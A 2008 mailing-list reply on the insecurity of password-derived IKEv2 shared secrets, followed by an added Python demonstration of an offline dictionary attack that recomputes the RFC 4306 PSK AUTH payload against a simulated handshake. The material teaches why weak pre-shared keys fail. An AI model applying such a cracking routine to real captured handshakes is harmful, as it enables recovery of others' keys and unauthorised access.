Uri Blumenthal | 1 Feb 2008 17:19

Re: shared secrets from passwords

On Jan 31, 2008, at 3:44 PM, Florian Weimer wrote:

> * Yoav Nir:
>
>> The idea is that this shared secret has the properties that (a) it
>> can't be used for anything other than IKEv2 so storing it is
>> presumably OK (why?), and (b) it looks random. The RFC goes on to
>> state this:
>>
>>                                As noted above, deriving the shared
>>   secret from a password is not secure.  This construction is used
>>   because it is anticipated that people will do it anyway.
>
> [RFC 4306]
>
> In retrospect, this is a bit off--it's insecure in what context?

Depends on the usage. If one uses password-derived shared secret to authenticate key agreement (using it in HMAC-like construct or otherwise in place of a "good" shared secret), or worse - as keying material - then it's insecure because an attacker can perform off-line brute-forcing on the observed exchange targeting the weak link - the password itself. However there are ways (Encrypted Key Exchange is the best example) to authenticate DH using password-derived shared secret with sufficient security.

Also, the more complex the password is (length, distance from dictionary-found words, use of full-spectrum alphabet) - the more computing resources the attacker would need to have a reasonable chance of success.
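The off-line attack described in the reply above, as an added illustration that is not part of the thread or of any IKEv2 implementation: a passive observer records the public exchange material and the PSK AUTH payload, then recomputes AUTH for each dictionary candidate without talking to either peer. It assumes HMAC-SHA256 as the negotiated prf, models the signed octets as constructed bytes rather than real IKEv2 encoding, and uses a constructed wordlist; the nested prf shape and the "Key Pad for IKEv2" string are the ones RFC 4306 section 2.15 gives for the pre-shared-key case.

```python
"""Off-line dictionary attack on a password-derived IKEv2-style PSK authenticator."""
import hashlib
import hmac
import os

# Constant string from RFC 4306 section 2.15.
KEY_PAD = b"Key Pad for IKEv2"

# Constructed wordlist for the demonstration (assumption: the victim chose
# a dictionary word as the "shared secret").
WORDLIST = [b"password", b"letmein", b"hunter2", b"swordfish", b"qwerty123"]


def prf(key: bytes, data: bytes) -> bytes:
    """The negotiated prf; HMAC-SHA256 is an assumption of this example."""
    return hmac.new(key, data, hashlib.sha256).digest()


def auth_payload(shared_secret: bytes, signed_octets: bytes) -> bytes:
    """Shape of the RFC 4306 PSK AUTH payload:
        AUTH = prf(prf(Shared Secret, "Key Pad for IKEv2"), <message octets>)
    Here the shared secret is the raw password bytes, i.e. the
    "derived from a password" case the quoted text warns about."""
    return prf(prf(shared_secret, KEY_PAD), signed_octets)


def run_exchange(password: bytes, rng=os.urandom):
    """Simulate what a passive attacker sees on the wire: the public
    IKE_SA_INIT material (DH public value, nonces, identity) and AUTH.
    The transcript layout is constructed, not real IKEv2 encoding."""
    signed_octets = b"".join([
        b"KE:" + rng(32),            # stand-in for the DH public value
        b"Ni:" + rng(16),            # initiator nonce
        b"Nr:" + rng(16),            # responder nonce
        b"ID:" + b"alice@example.com",
    ])
    return signed_octets, auth_payload(password, signed_octets)


def offline_dictionary_attack(signed_octets: bytes, auth: bytes, wordlist):
    """Recompute AUTH for each candidate password and compare with the
    observed value. Returns (password, guesses) on success, (None, guesses)
    otherwise. Nothing here contacts the initiator or responder, which is
    why rate limiting or lockout on the peers does not help."""
    for guesses, candidate in enumerate(wordlist, start=1):
        if hmac.compare_digest(auth_payload(candidate, signed_octets), auth):
            return candidate, guesses
    return None, len(wordlist)


if __name__ == "__main__":
    # Weak shared secret: recovered after a handful of guesses.
    octets, auth = run_exchange(b"swordfish")
    print("dictionary password:", offline_dictionary_attack(octets, auth, WORDLIST))
    # Random 256-bit shared secret: the same observation yields nothing.
    octets, auth = run_exchange(os.urandom(32))
    print("random secret:      ", offline_dictionary_attack(octets, auth, WORDLIST))
```

Swapping the wordlist for an exhaustive generator over a given alphabet and length turns the loop into the "computing resources" estimate the reply mentions: the attacker's cost is one double-HMAC per candidate, so the password's entropy is the only thing standing between a captured handshake and the secret.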